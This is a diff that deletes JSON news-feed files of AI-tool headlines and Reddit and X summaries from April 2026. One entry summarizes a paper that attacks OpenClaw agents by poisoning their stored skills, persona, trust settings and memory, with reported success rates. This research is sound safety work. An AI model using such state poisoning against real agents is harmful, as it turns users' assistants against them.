"open_source", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-07T11:50:38.000Z", - "summary": "I built something I genuinely enjoy with Claude. I was working on an app for a year and over last three weeks I completely replaced it with skills for Claude Code. Built frontend, backend, and matching mechanism with Claude. Disrupted myself. Launched six open source skills including Haah: human-agent-agent-human to network for your second brain.\n\nThe idea is to build up a few domains: People, Places, Books, Music, and link them together in a meaningful way. But then would not be cool that if I ", - "category": "ai_tools" - }, - { - "title": "stop buying courses to learn new tools. a $20 claude sub and one prompt is all you need.", - "url": "https://reddit.com/r/ClaudeAI/comments/1setmup/stop_buying_courses_to_learn_new_tools_a_20/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-07T11:46:58.000Z", - "summary": "**tl;dr** — feed a tool's docs into claude's context and use one prompt to turn it into a mentor that teaches by giving you tasks. not by lecturing. i've been doing this since claude launched Projects in mid-2024. haven't bought a tech course since.\n\nwhenever i need to pick up a new tool or framework, i skip the 3-hour youtube tutorials. instead, i grab the official docs (markdown from github), dump them into a claude chat, and send this:\n\n`You are my senior mentor. I have provided documentation", - "category": "ai_tools" - }, - { - "title": "[D] Your Agent, Their Asset: Real-world safety evaluation of OpenClaw agents (CIK poisoning raises attack success to ~64–74%)", - "url": "https://reddit.com/r/MachineLearning/comments/1sfbo0n/d_your_agent_their_asset_realworld_safety/", - "source": "Reddit r/MachineLearning", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-07T23:01:39.000Z", - "summary": "Paper: https://arxiv.org/abs/2604.04759\n\nThis paper presents a real-world safety evaluation of OpenClaw, a personal AI agent with access to Gmail, Stripe, and the local filesystem.\n\nThe authors introduce a taxonomy of persistent agent state:\n\n\\- Capability (skills / executable code)\n\n\\- Identity (persona, trust configuration)\n\n\\- Knowledge (memory)\n\nThey evaluate 12 attack scenarios on a live system across multiple models.\n\nKey results:\n\n\\- baseline attack success rate: \\~10–36.7%\n\n\\- after pois", - "category": "ai_research" - }, - { - "title": "Strix Halo + eGPU RTX 5070 Ti via OCuLink in llama.cpp: Benchmarks and Conclusions", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sf9i82/strix_halo_egpu_rtx_5070_ti_via_oculink_in/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-07T21:35:33.000Z", - "summary": "https://preview.redd.it/nqok3dch7utg1.jpg?width=4096&format=pjpg&auto=webp&s=d5c1d3f5e5c1d8c0ba986726d2bda08212175fec\n\nHey everyone. I have a Strix Halo miniPC (Minisforum MS-S1 Max). I added an RTX 5070 Ti eGPU to it via OCuLink, ran some tests on how they work together in llama.cpp, and wanted to share some of my findings.\n\n**TL;DR of my findings:**\n\n1. **Vulkan's versatility:** It's a highly efficient API that lets you stably combine chips from different vendors (like an AMD APU +", - "category": "ai_models" - }, - { - "title": "Found this cool new harness, gonna give it a spin with the new GLM 5.1. I’ll report back later.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sf6cds/found_this_cool_new_harness_gonna_give_it_a_spin/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-07T19:37:41.000Z", - "summary": "Found it on a USB drive in the parking lot. Should be interesting.\n\nSeriously tho, props to this guy and his cool Hermes Agent skins library here:\n\nhttps://github.com/joeynyc/hermes-skins", - "category": "ai_models" - }, - { - "title": "Gemma 4 - split mode Graph (Tensor Parallelism) in ik_llama incommming", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sf66a3/gemma_4_split_mode_graph_tensor_parallelism_in_ik/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-07T19:31:37.000Z", - "summary": "[https://github.com/ikawrakow/ik\\_llama.cpp/pull/1596](https://github.com/ikawrakow/ik_llama.cpp/pull/1596)\n\nThis should bring the 31b dense model in a usable speed range for many with dual/multi GPUs.\n\n\n\nAlso today I did quite some PPL Tests today with mainline llama.cpp and ik\\_llama.cpp \nunsloth variants (updated from yesterday) have like INSANE high PPL - without even trying KV Cache quants - on both.\n\nBartowski quants and the ggml-org ones are WAY lower on both, especially lower on ik\\_lla", - "category": "ai_models" - }, - { - "title": "Cloud AI subscriptions are getting desperate with retention. honestly makes me want to go more local", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sf305a/cloud_ai_subscriptions_are_getting_desperate_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-07T17:39:09.000Z", - "summary": "Ok so two things happened this week that made me appreciate my local setup way more\n\ntried to cancel cursor ($200/mo ultra plan) and they instantly threw 50% off at me before I could even confirm. no survey, no exit flow, just straight to \"please stay.\" thats not confidence lol\n\nthen claude (im on the $100/mo pro plan) started giving me free API calls. 100 one day, 100 the next day. no email about it, no announcement, just free compute showing up. very \"please dont leave\" energy\n\ntheir core cust", - "category": "ai_models" - }, - { - "title": "[P] A control plane for post-training workflows", - "url": "https://reddit.com/r/MachineLearning/comments/1sf1hdt/p_a_control_plane_for_posttraining_workflows/", - "source": "Reddit r/MachineLearning", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-07T16:47:30.000Z", - "summary": "We have been exploring a project around post-training infrastructure, a minimalist tool that does one thing really well: \nMake post-training a little less painful by equipping Researchers, AI/ML engineers & Tinkerers with a gentle control plane. Post-training models tends to introduce a new axis of complexity - the orchestration and compute ressource management - alongside defining your own training loop, your rewards & rubrics, managing the parallel training.\n\nTahuna is CLI-first, it s", - "category": "ai_research" - }, - { - "title": "Auto-creation of agent SKILLs from observing your screen via Gemma 4 for any agent to execute and self-improve", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sey6vv/autocreation_of_agent_skills_from_observing_your/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-07T14:50:28.000Z", - "summary": "AgentHandover is an open-source Mac menu bar app that watches your screen through Gemma 4 (running locally via Ollama) and turns your repeated workflows into structured Skill files that any agent can follow.\n\nI built it because every time I wanted an agent to handle something for me I had to explain the whole process from scratch, even for stuff I do daily. So AgentHandover just watches instead. You can either hit record for a specific task (Focus Record) or let it run in the background where it", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-08.json b/data/news-feed-2026-04-08.json deleted file mode 100644 index 752fd9e..0000000 --- a/data/news-feed-2026-04-08.json +++ /dev/null @@ -1,269 +0,0 @@ -{ - "generated": "2026-06-05T00:44:33.098Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-08", - "article_count": 15, - "archived_story_count": 652, - "articles": [ - { - "title": "@Vugola — Vugola Launches API — World's First Agentic Clipping Tool for Creators", - "url": "https://x.com/VadimStrizheus/status/2041498727131517193", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "matching_tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-08T05:24:41.410Z", - "summary": "Vugola has launched an API for the world's first agentic clipping tool. Send a YouTube link, your agent asks for ratio and caption styles, and delivers clips via Telegram, Discord, or WhatsApp.", - "category": "ai_tools" - }, - { - "title": "Scoble RT: Zapier Opens SDK to Everyone — 9,000+ App Integrations for AI Agent Builders", - "url": "https://x.com/wadefoster/status/2041721371357851859", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-08T04:15:45.495Z", - "summary": "Robert Scoble retweeted Zapier CEO Wade Foster's announcement that the Zapier SDK is now open to everyone building with AI agents.", - "category": "ai_tools" - }, - { - "title": "How I cut Claude Code usage in half (open source)", - "url": "https://reddit.com/r/ClaudeAI/comments/1sfgnzd/how_i_cut_claude_code_usage_in_half_open_source/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-08T02:41:03.000Z", - "summary": "Every time I start a Claude Code session on a real codebase, it burns through tokens just trying to understand the repo. Read the file tree, open 20 files, trace the imports, figure out how auth connects to the API layer. On a 50k+ LOC project that exploration phase eats your context window before any real work starts.\n\nI built Repowise to fix this. It's a codebase intelligence layer that pre-computes the structural knowledge Claude Code needs and exposes it through MCP tools. Dependency graphs ", - "category": "ai_tools" - }, - { - "title": "I used Claude to build a full networking protocol for AI agents. It’s now at 12K+ nodes across 19 countries.", - "url": "https://reddit.com/r/ClaudeAI/comments/1sg6gfe/i_used_claude_to_build_a_full_networking_protocol/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-08T21:40:39.000Z", - "summary": "I’ve been working on a core infrastructure problem for multi-agent systems and wanted to share an update since the last post here got some good discussion.\n\nThe problem: every agent framework assumes agents can already reach each other. MCP gives agents tools, A2A gives agents a way to talk, but both run on HTTP which means someone has to set up public endpoints, open ports, configure DNS, provision certs. The agent can’t do any of that itself. I used Claude Code to build the solution because th", - "category": "ai_tools" - }, - { - "title": "Anthropic launched Claude Managed Agents — cloud-hosted autonomous AI agents", - "url": "https://reddit.com/r/ClaudeAI/comments/1sfzigj/anthropic_launched_claude_managed_agents/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-04-08T17:27:42.000Z", - "summary": "Anthropic released a new API suite for deploying long-running autonomous agents with built-in sandboxing, credential management, and multi-agent coordination. Companies like Notion, Sentry, Asana, and Rakuten are already shipping with it, Sentry's agents are literally writing patches and opening PRs autonomously. [https://claude.com/blog/claude-managed-agents](https://claude.com/blog/claude-managed-agents) ", - "category": "ai_tools" - }, - { - "title": "Meta Releases Muse Spark - A Natively Multimodal Reasoning model", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sfyacf/meta_releases_muse_spark_a_natively_multimodal/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-08T16:44:50.000Z", - "summary": "Muse Spark is a natively multimodal reasoning model with support for tool-use, visual chain of thought, and multi-agent orchestration.\n\nBlog: [https://ai.meta.com/blog/introducing-muse-spark-msl/](https://ai.meta.com/blog/introducing-muse-spark-msl/)", - "category": "ai_models" - }, - { - "title": "Liquid AI releases LFM2.5-VL-450M - structured visual understanding at 240ms", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sfxs7f/liquid_ai_releases_lfm25vl450m_structured_visual/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-08T16:27:06.000Z", - "summary": "Today, we release LFM2.5-VL-450M our most capable vision-language model for edge deployment. It processes a 512×512 image in 240ms and it is fast enough to reason about every frame in a 4 FPS video stream. It builds on LFM2-VL-450M with three new capabilities:\n\n* bounding box prediction (81.28 on RefCOCO-M)\n* multilingual visual understanding across 9 languages (MMMB: 54.29 → 68.09), and\n* function calling support.\n\nMost production vision systems are still multi-stage: a detector, a classifier, ", - "category": "ai_models" - }, - { - "title": "Used TripoAI's latest open-source model, TripoSG and the image to mesh results are genuinely some of the best I've seen.", - "url": "https://reddit.com/r/StableDiffusion/comments/1sfxbs5/used_tripoais_latest_opensource_model_triposg_and/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-08T16:10:58.000Z", - "summary": "It's pretty neat, used \\~12.5gb out of the box. Output models are pretty high res and its lightning fast and seems like a good starting point compared to the prior TripoSR model.\n\n\n\nAnd, weights are permissively licensed (MIT) which might encourage more people to hack on it.\n\n\n\nAlso worth checking out r/Tripo.ai. They recently dropped the paid model H3.1, the performance is indeed very impressive, with some ongoing discount offers. That said, I'm curious: if a company releases newer models, is i", - "category": "creative_tools" - }, - { - "title": "M5 Max 128GB, 17 models, 23 prompts: Qwen 3.5 122B is still a local king", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sfr6u4/m5_max_128gb_17_models_23_prompts_qwen_35_122b_is/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-08T12:18:39.000Z", - "summary": "The last Llama (Scout/Maverick) was released a year ago. Since then US based releases have been super rare: Granite 3.3, GPT-OSS 20B & 120B, Nemotron 3 Nano / Super and now Gemma 4. Can't even compare to the solid Chinese open model output or Qwens, DeepSeeks, Kimis, MiniMaxes, GLMs, MiMos, Seeds, etc..\n\nGemma 4 is like a breath of fresh air. Not just the model itself, but the rollout, [the beauty](https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-gemma-4), the innovation: K=V i", - "category": "ai_models" - }, - { - "title": "Last Week in Multimodal AI - Local Edition", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sfk3ml/last_week_in_multimodal_ai_local_edition/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-08T05:36:35.000Z", - "summary": "I curate a weekly multimodal AI roundup, here are the local/open-source highlights from the last week:\n\n* **Google Gemma 4** \\- Open model family for coding and logical reasoning with a massive context window. Runs on a single machine.  [Post](https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/) | [Models](https://huggingface.co/blog/gemma4)\n* **TII Falcon Perception** \\- 0.6B early-fusion VLM with open-vocabulary grounding, segmentation, and OCR. Punches way above its wei", - "category": "ai_models" - }, - { - "title": "@omma_ai — Omma Launches Audio Generation — Music, Sound Effects, and Text to Speech", - "url": "https://x.com/omma_ai/status/2041622310503997632", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-08T05:24:41.410Z", - "summary": "Omma has launched audio generation including music and songs, sound effects, and text to speech. Users can generate audio and ask Omma to use it on websites, apps, and visualizations — usually in seconds.", - "category": "ai_tools" - }, - { - "title": "Review This Prompt And Feedback it.", - "url": "https://reddit.com/r/ChatGPT/comments/1sfo5qw/review_this_prompt_and_feedback_it/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.86, - "date": "2026-04-08T09:41:43.000Z", - "summary": " ROLE\n\nYou are an expert \\[e.g. full-stack developer / product designer / ML engineer\\] with deep experience in \\[tech stack / domain\\].\n\nYour job is to build this project end-to-end — from architecture to final output — with zero hand-holding needed.\n\n PROJECT\n\nName: \\[Project name\\]\n\nType: \\[Web app / CLI tool / API / Dashboard / Bot / etc.\\]\n\nOne-liner: \\[What it does in one sentence\\]\n\nTarget user: \\[Who will use this\\]\n\nGOAL\n\nBuild a complete, working, production-ready \\[project type\\] that", - "category": "ai_tools" - }, - { - "title": "Reddit is broken! I proved it with Claude", - "url": "https://reddit.com/r/ClaudeAI/comments/1sfk205/reddit_is_broken_i_proved_it_with_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.78, - "date": "2026-04-08T05:34:03.000Z", - "summary": "Built this for a hackathon. It's a Chrome extension that rescores every comment in a Reddit or HN thread using actual relevance instead of karma.\n\n**How I built it with Claude:**\n\nI used Claude (Sonnet via API) for pretty much the entire thing, generating the Chrome extension scaffold, writing the content extraction logic that pulls comments from Reddit's DOM, and building the ranking pipeline that sends comments to ZeroEntropy's zerank-2 model for instruction-reranking. Claude also helped me wr", - "category": "ai_tools" - }, - { - "title": "I built an MCP that gives Claude Code its own servers to fix bugs in parallel", - "url": "https://reddit.com/r/ClaudeAI/comments/1sg5j6w/i_built_an_mcp_that_gives_claude_code_its_own/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.7, - "date": "2026-04-08T21:05:27.000Z", - "summary": "I am increasingly using Claude Code, as much as and my laptop couldn't keep up. That macOS \"force quit\" window popped up so much I kept that window permanently open to resume activities... I had multiple projects and wanted to fix a dozen of bugs at the same time, generate other long features. Many agents on one machine doesn't work well, they eat resources and trip over each other.\n\nSo I built Gibil, a CLI that gives each task its own throwaway Linux. Real VM on Hetzner, about a minute, \\~$0.03", - "category": "ai_tools" - }, - { - "title": "Turbo-OCR for high-volume image and PDF processing", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sg8lfr/turboocr_for_highvolume_image_and_pdf_processing/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-08T23:08:06.000Z", - "summary": "I recently had to process \\~940,000 PDFs. I started with the standard OCR tools, but the bottlenecking was frustrating. Even on an RTX 5090, I was seeing low speed.\n\nThe Problem:\n\n* PaddleOCR (the most popular open source OCR): Maxed out at \\~15 img/s. GPU utilization hovered around 15%. Their high performance inference mode doesn't support Blackwell GPUs yet (needs CUDA < 12.8) and doesn't work with the latin recognition model either.\n* VLM OCR (via vLLM): Great accuracy, but crawled at 2 im", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-09.json b/data/news-feed-2026-04-09.json deleted file mode 100644 index 9edbb2b..0000000 --- a/data/news-feed-2026-04-09.json +++ /dev/null @@ -1,253 +0,0 @@ -{ - "generated": "2026-06-05T00:44:33.363Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-09", - "article_count": 15, - "archived_story_count": 616, - "articles": [ - { - "title": "Hermes Agent Is Displacing OpenClaw — And Nobody Is Talking About It", - "url": "https://x.com/ghumare64/status/2042234817358462986", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-09T14:33:10.226Z", - "summary": "Hermes Agent is quietly displacing OpenClaw as the dominant open-source AI agent framework, with a new memory plugin and viral tutorials driving adoption. The architectural difference is fundamental.", - "category": "ai_tools" - }, - { - "title": "OpenWork, an opensource Claude Cowork alternative, is silently relicensing under a commercial license", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sgnppg/openwork_an_opensource_claude_cowork_alternative/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-09T12:05:50.000Z", - "summary": "OpenWork is a locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode.\n\nJust a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore).\n\nMore details here: https://github.com/different-ai/openwork/issues/1412\n\nNote that as a fellow opensource developer mys", - "category": "ai_models" - }, - { - "title": "OpenWork, an opensource Claude Code alternative, is silently relicensing under a commercial license", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sgm9d1/openwork_an_opensource_claude_code_alternative_is/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-09T10:54:02.000Z", - "summary": "OpenWork is locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode.\n\nJust a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore).\n\nMore details here: https://github.com/different-ai/openwork/issues/1412\n\nNote that as a fellow opensource developer mysel", - "category": "ai_models" - }, - { - "title": "I built a multi-agent coordination plugin for Claude Code using Royal Navy procedures. 237 stars later I'm still not sure if the metaphor is genius or unhinged.", - "url": "https://reddit.com/r/ClaudeAI/comments/1sgx5i0/i_built_a_multiagent_coordination_plugin_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-04-09T17:59:55.000Z", - "summary": "So earlier this year Anthropic shipped the experimental Agent Teams feature. I'd spent the Christmas break reading about the Gas Town vision and was properly excited to try it. Agent Teams felt like Claude Code's version of a mini Gas Town.\n\nThen I actually used it. Agent one rewrote a module. Agent two rewrote that module's tests. Agent three updated the integration layer that depended on both. Nobody told agent three about the interface changes from agents one and two.\n\nThree pieces of perfect", - "category": "ai_tools" - }, - { - "title": "Managed Agents launched today. I built a Slack relay, tested it end-to-end. Here's what I found.", - "url": "https://reddit.com/r/ClaudeAI/comments/1sgejap/managed_agents_launched_today_i_built_a_slack/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-09T03:36:27.000Z", - "summary": "Managed Agents dropped a few hours ago. I had been reading the docs ahead of time, so I built a full Slack relay right away - Socket Mode listener, session-per-channel management, SSE streaming, cost tracking via span events. Tested multi-turn conversations, tool usage, session persistence. Wanted to share what I found. \n\nThe prompt caching is genuinely impressive. My second session cost $0.006 because the system prompt and tool definitions were served from cache automatically. API design is cle", - "category": "ai_tools" - }, - { - "title": "I built a security scanner for Claude Code (and vibe coding in general) — here's what it found in my own projects", - "url": "https://reddit.com/r/ClaudeAI/comments/1sgboiu/i_built_a_security_scanner_for_claude_code_and/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.78, - "date": "2026-04-09T01:24:01.000Z", - "summary": "I built VibeLint using Claude Code. It runs as an MCP server inside your IDE and scans AI-generated code for security issues before it gets written to your files.\n\nWhile building it, I started scanning my own projects with it. What I found was uncomfortable.\n\nIn one file, it caught my OpenAI API key and my Supabase service role key — both hardcoded by the AI. The service role key bypasses RLS entirely, meaning anyone with it has unrestricted access to the database.\n\nAcross my last 5 projects, th", - "category": "ai_tools" - }, - { - "title": "your claude doesn't need a better memory, it needs a self-evolving knowledge base", - "url": "https://reddit.com/r/ClaudeAI/comments/1sgr5zz/your_claude_doesnt_need_a_better_memory_it_needs/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-04-09T14:27:00.000Z", - "summary": "https://i.redd.it/57wdspbqc6ug1.gif\n\nAndrej Karpathy recently shared his setup for building a personal LLM knowledge base - raw docs, LLM compiles them into a structured wiki, then queries the wiki for answers.\n\nI've been building something similar for the past year, except it's not a set of scripts - it's a plugin you can install in 2 minutes.\n\nThe idea: every conversation you have in claude (Desktop, claude code or any MCP-compatible tool like codex, cursor) gets compacted into a memory episod", - "category": "ai_tools" - }, - { - "title": "Chinese AI models (Qwen, Kimi, MiniMax) are going closed-source. Does that kill their appeal for you?", - "url": "https://reddit.com/r/ChatGPT/comments/1sgfp00/chinese_ai_models_qwen_kimi_minimax_are_going/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 0.62, - "date": "2026-04-09T04:34:27.000Z", - "summary": "Honest question for people who actually use these models:\n\nThe main reason I and many others trusted Chinese AI models was open source — you could run them locally, inspect the weights, avoid sending data to Chinese servers. That felt like a reasonable workaround for anyone with privacy or geopolitical concerns.\n\nNow that they're closing up, the calculus changes:\n\n\\- No local deployment\n\n\\- API calls go to servers in China\n\n\\- No way to verify what the model is actually doing\n\nIs this a dealbrea", - "category": "ai_tools" - }, - { - "title": "Dynamic few-shot retrieval on Apple's on-device 3B LLM: 40% → 70%+ on shell commands", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sgxo6d/dynamic_fewshot_retrieval_on_apples_ondevice_3b/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-09T18:17:58.000Z", - "summary": "I've been poking at Apple's on-device 3B model (via FoundationModels on Tahoe) to see where its ceiling sits on code-adjacent tasks. Tested shell command generation as a concrete benchmark (100 prompts, \\~10 approaches)\n\nhttps://i.redd.it/ferxmyorh7ug1.gif\n\nBare model: \\~40% correct. Mostly flags and some command hallucinations. Feeding documentation as context didn't help. Not man pages, not tldr as docs, not self-critique loops. All within noise of baseline, and self-critique was actively wors", - "category": "ai_models" - }, - { - "title": "OpenAI pauses UK data centre deal over energy costs and regulationThe project was part of a package of tech investment promising the UK could become an AI superpower.See more", - "url": "https://www.bbc.com/news/articles/clyd032ej70o", - "source": "BBC AI", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-09T18:00:10.184Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "I benchmarked 42 STT models on medical audio with a new Medical WER metric — the leaderboard completely reshuffled", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sgtrgc/i_benchmarked_42_stt_models_on_medical_audio_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-09T16:00:16.000Z", - "summary": "**TL;DR:** I updated my medical speech-to-text benchmark to **42 models** (up from 31 in v3) and added a new metric: **Medical WER (M-WER)**.\n\nStandard WER treats every word equally. In medical audio, that makes little sense — **“yeah” and “amoxicillin” do not carry the same importance**.\n\nSo for v4 I re-scored the benchmark using only **clinically relevant words**: drugs, conditions, symptoms, anatomy, and clinical procedures. I also broke out **Drug M-WER** separately, since medication names a", - "category": "ai_models" - }, - { - "title": "LG Just Released the First Open-Weight Vision Language Model for Physical Intelligence", - "url": "https://x.com/LG_AI_Research", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-09T14:33:10.226Z", - "summary": "LG AI Research launched EXAONE 4.5, their first open-weight Vision Language Model targeting physical intelligence and robotics. LG's hardware and manufacturing expertise gives them unique insight into what robots need.", - "category": "ai_tools" - }, - { - "title": "Open-Source Models Can Do Everything Claude Mythos Can Do", - "url": "https://x.com/stanislavfort", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-09T14:33:10.226Z", - "summary": "Researchers replicated all 8 Mythos security vulnerabilities using open-source models, proving dangerous AI capabilities cannot be contained by restricting frontier model access. The finding has major implications for AI safety policy.", - "category": "ai_tools" - }, - { - "title": "NanoBanana Powers WorldAgents — AI Image Generator Used for 3D World Creation", - "url": "https://x.com/MattNiessner/status/2036019740930408905", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-09T14:29:35.589Z", - "summary": "NanoBanana is being used as the Generator in WorldAgents for 3D world creation, demonstrating how AI image models are being integrated into complex multi-agent creative systems. The integration highlights NanoBanana's versatility.", - "category": "ai_tools" - }, - { - "title": "Unused phone as AI server", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sgqlfn/unused_phone_as_ai_server/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-09T14:05:51.000Z", - "summary": "If you have an unused phone lying around, you might be sitting on a tiny AI server\n\nI’ve been working on a project where I modified Google AI Edge Gallery and turned it into an OpenAI-compatible API server: \\[Gallery as Server\\](https://github.com/xiaoyao9184/gallery)\n\nYour phone can run local AI inference\n\nYou can call it just like an OpenAI API (chat/completions, etc.)\n\nInstead of letting that hardware collect dust, you can turn it into a lightweight inference node.\n\nSo yeah—if you have more t", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-10.json b/data/news-feed-2026-04-10.json deleted file mode 100644 index 391cf9f..0000000 --- a/data/news-feed-2026-04-10.json +++ /dev/null @@ -1,245 +0,0 @@ -{ - "generated": "2026-06-05T00:44:33.549Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-10", - "article_count": 15, - "archived_story_count": 178, - "articles": [ - { - "title": "Anthropic just shipped 74 product releases in 52 days and silently turned Claude into something that isn't a chatbot anymore", - "url": "https://reddit.com/r/ClaudeAI/comments/1she8ux/anthropic_just_shipped_74_product_releases_in_52/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "product_launch", - "developer_tool", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-10T06:08:44.000Z", - "summary": "Anthropic just made Claude Cowork generally available on all paid plans, added enterprise controls, role based access, spend limits, OpenTelemetry observability and a Zoom connector, plus they launched Managed Agents which is basically composable APIs for deploying cloud 